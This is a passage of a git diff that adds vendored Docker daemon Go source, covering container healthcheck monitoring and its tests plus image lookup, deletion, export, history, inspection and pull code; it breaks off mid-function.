Ignore result then + select { + case <-done: + return + default: + } + + retries := c.Config.Healthcheck.Retries + if retries <= 0 { + retries = defaultProbeRetries + } + + h := c.State.Health + oldStatus := h.Status + + if len(h.Log) >= maxLogEntries { + h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result) + } else { + h.Log = append(h.Log, result) + } + + if result.ExitCode == exitStatusHealthy { + h.FailingStreak = 0 + h.Status = types.Healthy + } else { + // Failure (including invalid exit code) + h.FailingStreak++ + if h.FailingStreak >= retries { + h.Status = types.Unhealthy + } + // Else we're starting or healthy. Stay in that state. + } + + if oldStatus != h.Status { + d.LogContainerEvent(c, "health_status: "+h.Status) + } +} + +// Run the container's monitoring thread until notified via "stop". +// There is never more than one monitor thread running per container at a time. +func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) { + probeTimeout := timeoutWithDefault(c.Config.Healthcheck.Timeout, defaultProbeTimeout) + probeInterval := timeoutWithDefault(c.Config.Healthcheck.Interval, defaultProbeInterval) + for { + select { + case <-stop: + logrus.Debugf("Stop healthcheck monitoring for container %s (received while idle)", c.ID) + return + case <-time.After(probeInterval): + logrus.Debugf("Running health check for container %s ...", c.ID) + startTime := time.Now() + ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout) + results := make(chan *types.HealthcheckResult) + go func() { + healthChecksCounter.Inc() + result, err := probe.run(ctx, d, c) + if err != nil { + healthChecksFailedCounter.Inc() + logrus.Warnf("Health check for container %s error: %v", c.ID, err) + results <- &types.HealthcheckResult{ + ExitCode: -1, + Output: err.Error(), + Start: startTime, + End: time.Now(), + } + } else { + result.Start = startTime + logrus.Debugf("Health check for container %s done (exitCode=%d)", c.ID, 
result.ExitCode) + results <- result + } + close(results) + }() + select { + case <-stop: + logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID) + // Stop timeout and kill probe, but don't wait for probe to exit. + cancelProbe() + return + case result := <-results: + handleProbeResult(d, c, result, stop) + // Stop timeout + cancelProbe() + case <-ctx.Done(): + logrus.Debugf("Health check for container %s taking too long", c.ID) + handleProbeResult(d, c, &types.HealthcheckResult{ + ExitCode: -1, + Output: fmt.Sprintf("Health check exceeded timeout (%v)", probeTimeout), + Start: startTime, + End: time.Now(), + }, stop) + cancelProbe() + // Wait for probe to exit (it might take a while to respond to the TERM + // signal and we don't want dying probes to pile up). + <-results + } + } + } +} + +// Get a suitable probe implementation for the container's healthcheck configuration. +// Nil will be returned if no healthcheck was configured or NONE was set. +func getProbe(c *container.Container) probe { + config := c.Config.Healthcheck + if config == nil || len(config.Test) == 0 { + return nil + } + switch config.Test[0] { + case "CMD": + return &cmdProbe{shell: false} + case "CMD-SHELL": + return &cmdProbe{shell: true} + default: + logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID) + return nil + } +} + +// Ensure the health-check monitor is running or not, depending on the current +// state of the container. +// Called from monitor.go, with c locked. 
+func (d *Daemon) updateHealthMonitor(c *container.Container) { + h := c.State.Health + if h == nil { + return // No healthcheck configured + } + + probe := getProbe(c) + wantRunning := c.Running && !c.Paused && probe != nil + if wantRunning { + if stop := h.OpenMonitorChannel(); stop != nil { + go monitor(d, c, stop, probe) + } + } else { + h.CloseMonitorChannel() + } +} + +// Reset the health state for a newly-started, restarted or restored container. +// initHealthMonitor is called from monitor.go and we should never be running +// two instances at once. +// Called with c locked. +func (d *Daemon) initHealthMonitor(c *container.Container) { + // If no healthcheck is setup then don't init the monitor + if getProbe(c) == nil { + return + } + + // This is needed in case we're auto-restarting + d.stopHealthchecks(c) + + if h := c.State.Health; h != nil { + h.Status = types.Starting + h.FailingStreak = 0 + } else { + h := &container.Health{} + h.Status = types.Starting + c.State.Health = h + } + + d.updateHealthMonitor(c) +} + +// Called when the container is being stopped (whether because the health check is +// failing or for any other reason). +func (d *Daemon) stopHealthchecks(c *container.Container) { + h := c.State.Health + if h != nil { + h.CloseMonitorChannel() + } +} + +// Buffer up to maxOutputLen bytes. Further data is discarded. +type limitedBuffer struct { + buf bytes.Buffer + mu sync.Mutex + truncated bool // indicates that data has been lost +} + +// Append to limitedBuffer while there is room. +func (b *limitedBuffer) Write(data []byte) (int, error) { + b.mu.Lock() + defer b.mu.Unlock() + + bufLen := b.buf.Len() + dataLen := len(data) + keep := min(maxOutputLen-bufLen, dataLen) + if keep > 0 { + b.buf.Write(data[:keep]) + } + if keep < dataLen { + b.truncated = true + } + return dataLen, nil +} + +// The contents of the buffer, with "..." appended if it overflowed. 
+func (b *limitedBuffer) String() string { + b.mu.Lock() + defer b.mu.Unlock() + + out := b.buf.String() + if b.truncated { + out = out + "..." + } + return out +} + +// If configuredValue is zero, use defaultValue instead. +func timeoutWithDefault(configuredValue time.Duration, defaultValue time.Duration) time.Duration { + if configuredValue == 0 { + return defaultValue + } + return configuredValue +} + +func min(x, y int) int { + if x < y { + return x + } + return y +} + +func getShell(config *containertypes.Config) []string { + if len(config.Shell) != 0 { + return config.Shell + } + if runtime.GOOS != "windows" { + return []string{"/bin/sh", "-c"} + } + return []string{"cmd", "/S", "/C"} +} diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go new file mode 100644 index 0000000000..7e82115d43 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/health_test.go @@ -0,0 +1,118 @@ +package daemon + +import ( + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/events" +) + +func reset(c *container.Container) { + c.State = &container.State{} + c.State.Health = &container.Health{} + c.State.Health.Status = types.Starting +} + +func TestNoneHealthcheck(t *testing.T) { + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Healthcheck: &containertypes.HealthConfig{ + Test: []string{"NONE"}, + }, + }, + State: &container.State{}, + }, + } + daemon := &Daemon{} + + daemon.initHealthMonitor(c) + if c.State.Health != nil { + t.Errorf("Expecting Health to be nil, but was not") + } +} + +func TestHealthStates(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + 
defer e.Evict(l) + + expect := func(expected string) { + select { + case event := <-l: + ev := event.(eventtypes.Message) + if ev.Status != expected { + t.Errorf("Expecting event %#v, but got %#v\n", expected, ev.Status) + } + case <-time.After(1 * time.Second): + t.Errorf("Expecting event %#v, but got nothing\n", expected) + } + } + + c := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + + c.Config.Healthcheck = &containertypes.HealthConfig{ + Retries: 1, + } + + reset(c) + + handleResult := func(startTime time.Time, exitCode int) { + handleProbeResult(daemon, c, &types.HealthcheckResult{ + Start: startTime, + End: startTime, + ExitCode: exitCode, + }, nil) + } + + // starting -> failed -> success -> failed + + handleResult(c.State.StartedAt.Add(1*time.Second), 1) + expect("health_status: unhealthy") + + handleResult(c.State.StartedAt.Add(2*time.Second), 0) + expect("health_status: healthy") + + handleResult(c.State.StartedAt.Add(3*time.Second), 1) + expect("health_status: unhealthy") + + // Test retries + + reset(c) + c.Config.Healthcheck.Retries = 3 + + handleResult(c.State.StartedAt.Add(20*time.Second), 1) + handleResult(c.State.StartedAt.Add(40*time.Second), 1) + if c.State.Health.Status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status) + } + if c.State.Health.FailingStreak != 2 { + t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(60*time.Second), 1) + expect("health_status: unhealthy") + + handleResult(c.State.StartedAt.Add(80*time.Second), 0) + expect("health_status: healthy") + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } +} diff --git 
a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go new file mode 100644 index 0000000000..32a8d77432 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image.go @@ -0,0 +1,76 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" +) + +// ErrImageDoesNotExist is error returned when no image can be found for a reference. +type ErrImageDoesNotExist struct { + RefOrID string +} + +func (e ErrImageDoesNotExist) Error() string { + return fmt.Sprintf("no such id: %s", e.RefOrID) +} + +// GetImageID returns an image ID corresponding to the image referred to by +// refOrID. +func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) { + id, ref, err := reference.ParseIDOrReference(refOrID) + if err != nil { + return "", err + } + if id != "" { + if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil { + return "", ErrImageDoesNotExist{refOrID} + } + return image.IDFromDigest(id), nil + } + + if id, err := daemon.referenceStore.Get(ref); err == nil { + return image.IDFromDigest(id), nil + } + + // deprecated: repo:shortid https://github.com/docker/docker/pull/799 + if tagged, ok := ref.(reference.NamedTagged); ok { + if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) { + if id, err := daemon.imageStore.Search(tag); err == nil { + for _, namedRef := range daemon.referenceStore.References(id.Digest()) { + if namedRef.Name() == ref.Name() { + return id, nil + } + } + } + } + } + + // Search based on ID + if id, err := daemon.imageStore.Search(refOrID); err == nil { + return id, nil + } + + return "", ErrImageDoesNotExist{refOrID} +} + +// GetImage returns an image corresponding to the image referred to by refOrID. 
+func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) { + imgID, err := daemon.GetImageID(refOrID) + if err != nil { + return nil, err + } + return daemon.imageStore.Get(imgID) +} + +// GetImageOnBuild looks up a Docker image referenced by `name`. +func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) { + img, err := daemon.GetImage(name) + if err != nil { + return nil, err + } + return img, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/image_delete.go new file mode 100644 index 0000000000..3e3c142e9c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_delete.go @@ -0,0 +1,412 @@ +package daemon + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" +) + +type conflictType int + +const ( + conflictDependentChild conflictType = (1 << iota) + conflictRunningContainer + conflictActiveReference + conflictStoppedContainer + conflictHard = conflictDependentChild | conflictRunningContainer + conflictSoft = conflictActiveReference | conflictStoppedContainer +) + +// ImageDelete deletes the image referenced by the given imageRef from this +// daemon. The given imageRef can be an image ID, ID prefix, or a repository +// reference (with an optional tag or digest, defaulting to the tag name +// "latest"). There is differing behavior depending on whether the given +// imageRef is a repository reference or not. +// +// If the given imageRef is a repository reference then that repository +// reference will be removed. 
However, if there exists any containers which +// were created using the same image reference then the repository reference +// cannot be removed unless either there are other repository references to the +// same image or force is true. Following removal of the repository reference, +// the referenced image itself will attempt to be deleted as described below +// but quietly, meaning any image delete conflicts will cause the image to not +// be deleted and the conflict will not be reported. +// +// There may be conflicts preventing deletion of an image and these conflicts +// are divided into two categories grouped by their severity: +// +// Hard Conflict: +// - a pull or build using the image. +// - any descendant image. +// - any running container using the image. +// +// Soft Conflict: +// - any stopped container using the image. +// - any repository tag or digest references to the image. +// +// The image cannot be removed if there are any hard conflicts and can be +// removed if there are soft conflicts only if force is true. +// +// If prune is true, ancestor images will each attempt to be deleted quietly, +// meaning any delete conflicts will cause the image to not be deleted and the +// conflict will not be reported. +// +// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph +// package. This would require that we no longer need the daemon to determine +// whether images are being used by a stopped or running container. +func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) { + start := time.Now() + records := []types.ImageDelete{} + + imgID, err := daemon.GetImageID(imageRef) + if err != nil { + return nil, daemon.imageNotExistToErrcode(err) + } + + repoRefs := daemon.referenceStore.References(imgID.Digest()) + + var removedRepositoryRef bool + if !isImageIDPrefix(imgID.String(), imageRef) { + // A repository reference was given and should be removed + // first. 
We can only remove this reference if either force is + // true, there are multiple repository references to this + // image, or there are no containers using the given reference. + if !force && isSingleReference(repoRefs) { + if container := daemon.getContainerUsingImage(imgID); container != nil { + // If we removed the repository reference then + // this image would remain "dangling" and since + // we really want to avoid that the client must + // explicitly force its removal. + err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) + return nil, errors.NewRequestConflictError(err) + } + } + + parsedRef, err := reference.ParseNamed(imageRef) + if err != nil { + return nil, err + } + + parsedRef, err = daemon.removeImageRef(parsedRef) + if err != nil { + return nil, err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + records = append(records, untaggedRecord) + + repoRefs = daemon.referenceStore.References(imgID.Digest()) + + // If a tag reference was removed and the only remaining + // references to the same repository are digest references, + // then clean up those digest references. 
+ if _, isCanonical := parsedRef.(reference.Canonical); !isCanonical { + foundRepoTagRef := false + for _, repoRef := range repoRefs { + if _, repoRefIsCanonical := repoRef.(reference.Canonical); !repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { + foundRepoTagRef = true + break + } + } + if !foundRepoTagRef { + // Remove canonical references from same repository + remainingRefs := []reference.Named{} + for _, repoRef := range repoRefs { + if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { + if _, err := daemon.removeImageRef(repoRef); err != nil { + return records, err + } + + untaggedRecord := types.ImageDelete{Untagged: repoRef.String()} + records = append(records, untaggedRecord) + } else { + remainingRefs = append(remainingRefs, repoRef) + + } + } + repoRefs = remainingRefs + } + } + + // If it has remaining references then the untag finished the remove + if len(repoRefs) > 0 { + return records, nil + } + + removedRepositoryRef = true + } else { + // If an ID reference was given AND there is at most one tag + // reference to the image AND all references are within one + // repository, then remove all references. 
+ if isSingleReference(repoRefs) { + c := conflictHard + if !force { + c |= conflictSoft &^ conflictActiveReference + } + if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + return nil, conflict + } + + for _, repoRef := range repoRefs { + parsedRef, err := daemon.removeImageRef(repoRef) + if err != nil { + return nil, err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + records = append(records, untaggedRecord) + } + } + } + + if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { + return nil, err + } + + imageActions.WithValues("delete").UpdateSince(start) + + return records, nil +} + +// isSingleReference returns true when all references are from one repository +// and there is at most one tag. Returns false for empty input. +func isSingleReference(repoRefs []reference.Named) bool { + if len(repoRefs) <= 1 { + return len(repoRefs) == 1 + } + var singleRef reference.Named + canonicalRefs := map[string]struct{}{} + for _, repoRef := range repoRefs { + if _, isCanonical := repoRef.(reference.Canonical); isCanonical { + canonicalRefs[repoRef.Name()] = struct{}{} + } else if singleRef == nil { + singleRef = repoRef + } else { + return false + } + } + if singleRef == nil { + // Just use first canonical ref + singleRef = repoRefs[0] + } + _, ok := canonicalRefs[singleRef.Name()] + return len(canonicalRefs) == 1 && ok +} + +// isImageIDPrefix returns whether the given possiblePrefix is a prefix of the +// given imageID. +func isImageIDPrefix(imageID, possiblePrefix string) bool { + if strings.HasPrefix(imageID, possiblePrefix) { + return true + } + + if i := strings.IndexRune(imageID, ':'); i >= 0 { + return strings.HasPrefix(imageID[i+1:], possiblePrefix) + } + + return false +} + +// getContainerUsingImage returns a container that was created using the given +// imageID. 
Returns nil if there is no such container. +func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container { + return daemon.containers.First(func(c *container.Container) bool { + return c.ImageID == imageID + }) +} + +// removeImageRef attempts to parse and remove the given image reference from +// this daemon's store of repository tag/digest references. The given +// repositoryRef must not be an image ID but a repository name followed by an +// optional tag or digest reference. If tag or digest is omitted, the default +// tag is used. Returns the resolved image reference and an error. +func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) { + ref = reference.WithDefaultTag(ref) + // Ignore the boolean value returned, as far as we're concerned, this + // is an idempotent operation and it's okay if the reference didn't + // exist in the first place. + _, err := daemon.referenceStore.Delete(ref) + + return ref, err +} + +// removeAllReferencesToImageID attempts to remove every reference to the given +// imgID from this daemon's store of repository tag/digest references. Returns +// on the first encountered error. Removed references are logged to this +// daemon's event service. An "Untagged" types.ImageDelete is added to the +// given list of records. +func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error { + imageRefs := daemon.referenceStore.References(imgID.Digest()) + + for _, imageRef := range imageRefs { + parsedRef, err := daemon.removeImageRef(imageRef) + if err != nil { + return err + } + + untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + + daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + *records = append(*records, untaggedRecord) + } + + return nil +} + +// ImageDeleteConflict holds a soft or hard conflict and an associated error. +// Implements the error interface. 
+type imageDeleteConflict struct { + hard bool + used bool + imgID image.ID + message string +} + +func (idc *imageDeleteConflict) Error() string { + var forceMsg string + if idc.hard { + forceMsg = "cannot be forced" + } else { + forceMsg = "must be forced" + } + + return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message) +} + +// imageDeleteHelper attempts to delete the given image from this daemon. If +// the image has any hard delete conflicts (child images or running containers +// using the image) then it cannot be deleted. If the image has any soft delete +// conflicts (any tags/digests referencing the image or any stopped container +// using the image) then it can only be deleted if force is true. If the delete +// succeeds and prune is true, the parent images are also deleted if they do +// not have any soft or hard delete conflicts themselves. Any deleted images +// and untagged references are appended to the given records. If any error or +// conflict is encountered, it will be returned immediately without deleting +// the image. If quiet is true, any encountered conflicts will be ignored and +// the function will return nil immediately without deleting the image. +func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error { + // First, determine if this image has any conflicts. Ignore soft conflicts + // if force is true. + c := conflictHard + if !force { + c |= conflictSoft + } + if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + if quiet && (!daemon.imageIsDangling(imgID) || conflict.used) { + // Ignore conflicts UNLESS the image is "dangling" or not being used in + // which case we want the user to know. + return nil + } + + // There was a conflict and it's either a hard conflict OR we are not + // forcing deletion on soft conflicts. 
+ return conflict + } + + parent, err := daemon.imageStore.GetParent(imgID) + if err != nil { + // There may be no parent + parent = "" + } + + // Delete all repository tag/digest references to this image. + if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil { + return err + } + + removedLayers, err := daemon.imageStore.Delete(imgID) + if err != nil { + return err + } + + daemon.LogImageEvent(imgID.String(), imgID.String(), "delete") + *records = append(*records, types.ImageDelete{Deleted: imgID.String()}) + for _, removedLayer := range removedLayers { + *records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()}) + } + + if !prune || parent == "" { + return nil + } + + // We need to prune the parent image. This means delete it if there are + // no tags/digests referencing it and there are no containers using it ( + // either running or stopped). + // Do not force prunings, but do so quietly (stopping on any encountered + // conflicts). + return daemon.imageDeleteHelper(parent, records, false, true, true) +} + +// checkImageDeleteConflict determines whether there are any conflicts +// preventing deletion of the given image from this daemon. A hard conflict is +// any image which has the given image as a parent or any running container +// using the image. A soft conflict is any tags/digest referencing the given +// image or any stopped container using the image. If ignoreSoftConflicts is +// true, this function will not check for soft conflict conditions. +func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { + // Check if the image has any descendant images. + if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 { + return &imageDeleteConflict{ + hard: true, + imgID: imgID, + message: "image has dependent child images", + } + } + + if mask&conflictRunningContainer != 0 { + // Check if any running container is using the image. 
+ running := func(c *container.Container) bool { + return c.IsRunning() && c.ImageID == imgID + } + if container := daemon.containers.First(running); container != nil { + return &imageDeleteConflict{ + imgID: imgID, + hard: true, + used: true, + message: fmt.Sprintf("image is being used by running container %s", stringid.TruncateID(container.ID)), + } + } + } + + // Check if any repository tags/digest reference this image. + if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 { + return &imageDeleteConflict{ + imgID: imgID, + message: "image is referenced in multiple repositories", + } + } + + if mask&conflictStoppedContainer != 0 { + // Check if any stopped containers reference this image. + stopped := func(c *container.Container) bool { + return !c.IsRunning() && c.ImageID == imgID + } + if container := daemon.containers.First(stopped); container != nil { + return &imageDeleteConflict{ + imgID: imgID, + used: true, + message: fmt.Sprintf("image is being used by stopped container %s", stringid.TruncateID(container.ID)), + } + } + } + + return nil +} + +// imageIsDangling returns whether the given image is "dangling" which means +// that there are no repository references to the given image and it has no +// child images. +func (daemon *Daemon) imageIsDangling(imgID image.ID) bool { + return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0) +} diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/image_exporter.go new file mode 100644 index 0000000000..95d1d3dcdb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_exporter.go @@ -0,0 +1,25 @@ +package daemon + +import ( + "io" + + "github.com/docker/docker/image/tarexport" +) + +// ExportImage exports a list of images to the given output stream. The +// exported images are archived into a tar when written to the output +// stream. 
All images with the given tag and all versions containing +// the same tag are exported. names is the set of tags to export, and +// outStream is the writer which the images are written to. +func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error { + imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) + return imageExporter.Save(names, outStream) +} + +// LoadImage uploads a set of images into the repository. This is the +// complement of ImageExport. The input stream is an uncompressed tar +// ball containing images and metadata. +func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) + return imageExporter.Load(inTar, outStream, quiet) +} diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/image_history.go new file mode 100644 index 0000000000..839dd1283b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_history.go @@ -0,0 +1,84 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +// ImageHistory returns a slice of ImageHistory structures for the specified image +// name by walking the image lineage. 
+func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { + start := time.Now() + img, err := daemon.GetImage(name) + if err != nil { + return nil, err + } + + history := []*types.ImageHistory{} + + layerCounter := 0 + rootFS := *img.RootFS + rootFS.DiffIDs = nil + + for _, h := range img.History { + var layerSize int64 + + if !h.EmptyLayer { + if len(img.RootFS.DiffIDs) <= layerCounter { + return nil, fmt.Errorf("too many non-empty layers in History section") + } + + rootFS.Append(img.RootFS.DiffIDs[layerCounter]) + l, err := daemon.layerStore.Get(rootFS.ChainID()) + if err != nil { + return nil, err + } + layerSize, err = l.DiffSize() + layer.ReleaseAndLog(daemon.layerStore, l) + if err != nil { + return nil, err + } + + layerCounter++ + } + + history = append([]*types.ImageHistory{{ + ID: "", + Created: h.Created.Unix(), + CreatedBy: h.CreatedBy, + Comment: h.Comment, + Size: layerSize, + }}, history...) + } + + // Fill in image IDs and tags + histImg := img + id := img.ID() + for _, h := range history { + h.ID = id.String() + + var tags []string + for _, r := range daemon.referenceStore.References(id.Digest()) { + if _, ok := r.(reference.NamedTagged); ok { + tags = append(tags, r.String()) + } + } + + h.Tags = tags + + id = histImg.Parent + if id == "" { + break + } + histImg, err = daemon.GetImage(id.String()) + if err != nil { + break + } + } + imageActions.WithValues("history").UpdateSince(start) + return history, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/image_inspect.go new file mode 100644 index 0000000000..ebf912469c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_inspect.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +// LookupImage looks up an image by name and returns it as an ImageInspect +// 
structure. +func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { + img, err := daemon.GetImage(name) + if err != nil { + return nil, fmt.Errorf("No such image: %s", name) + } + + refs := daemon.referenceStore.References(img.ID().Digest()) + repoTags := []string{} + repoDigests := []string{} + for _, ref := range refs { + switch ref.(type) { + case reference.NamedTagged: + repoTags = append(repoTags, ref.String()) + case reference.Canonical: + repoDigests = append(repoDigests, ref.String()) + } + } + + var size int64 + var layerMetadata map[string]string + layerID := img.RootFS.ChainID() + if layerID != "" { + l, err := daemon.layerStore.Get(layerID) + if err != nil { + return nil, err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + size, err = l.Size() + if err != nil { + return nil, err + } + + layerMetadata, err = l.Metadata() + if err != nil { + return nil, err + } + } + + comment := img.Comment + if len(comment) == 0 && len(img.History) > 0 { + comment = img.History[len(img.History)-1].Comment + } + + imageInspect := &types.ImageInspect{ + ID: img.ID().String(), + RepoTags: repoTags, + RepoDigests: repoDigests, + Parent: img.Parent.String(), + Comment: comment, + Created: img.Created.Format(time.RFC3339Nano), + Container: img.Container, + ContainerConfig: &img.ContainerConfig, + DockerVersion: img.DockerVersion, + Author: img.Author, + Config: img.Config, + Architecture: img.Architecture, + Os: img.OS, + OsVersion: img.OSVersion, + Size: size, + VirtualSize: size, // TODO: field unused, deprecate + RootFS: rootFSToAPIType(img.RootFS), + } + + imageInspect.GraphDriver.Name = daemon.GraphDriverName() + + imageInspect.GraphDriver.Data = layerMetadata + + return imageInspect, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/image_pull.go new file mode 100644 index 0000000000..2157d15974 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_pull.go @@ -0,0 
+1,149 @@ +package daemon + +import ( + "io" + "strings" + + dist "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// PullImage initiates a pull operation. image is the repository name to pull, and +// tag may be either empty, or indicate a specific tag to pull. +func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + // Special case: "pull -a" may send an image name with a + // trailing :. This is ugly, but let's not break API + // compatibility. + image = strings.TrimSuffix(image, ":") + + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + + if tag != "" { + // The "tag" could actually be a digest. + var dgst digest.Digest + dgst, err = digest.ParseDigest(tag) + if err == nil { + ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst) + } else { + ref, err = reference.WithTag(ref, tag) + } + if err != nil { + return err + } + } + + return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream) +} + +// PullOnBuild tells Docker to pull image referenced by `name`. 
+func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) { + ref, err := reference.ParseNamed(name) + if err != nil { + return nil, err + } + ref = reference.WithDefaultTag(ref) + + pullRegistryAuth := &types.AuthConfig{} + if len(authConfigs) > 0 { + // The request came with a full auth config file, we prefer to use that + repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + if err != nil { + return nil, err + } + + resolvedConfig := registry.ResolveAuthConfig( + authConfigs, + repoInfo.Index, + ) + pullRegistryAuth = &resolvedConfig + } + + if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil { + return nil, err + } + return daemon.GetImage(name) +} + +func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + // Include a buffer so that slow client connections don't affect + // transfer performance. 
+ progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + ctx, cancelFunc := context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + imagePullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeaders, + AuthConfig: authConfig, + ProgressOutput: progress.ChanOutput(progressChan), + RegistryService: daemon.RegistryService, + ImageEventLogger: daemon.LogImageEvent, + MetadataStore: daemon.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), + ReferenceStore: daemon.referenceStore, + }, + DownloadManager: daemon.downloadManager, + Schema2Types: distribution.ImageTypes, + } + + err := distribution.Pull(ctx, ref, imagePullConfig) + close(progressChan) + <-writesDone + return err +} + +// GetRepository returns a repository from the registry. +func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) { + // get repository info + repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + if err != nil { + return nil, false, err + } + // makes sure name is not empty or `scratch` + if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil { + return nil, false, err + } + + // get endpoints + endpoints, err := 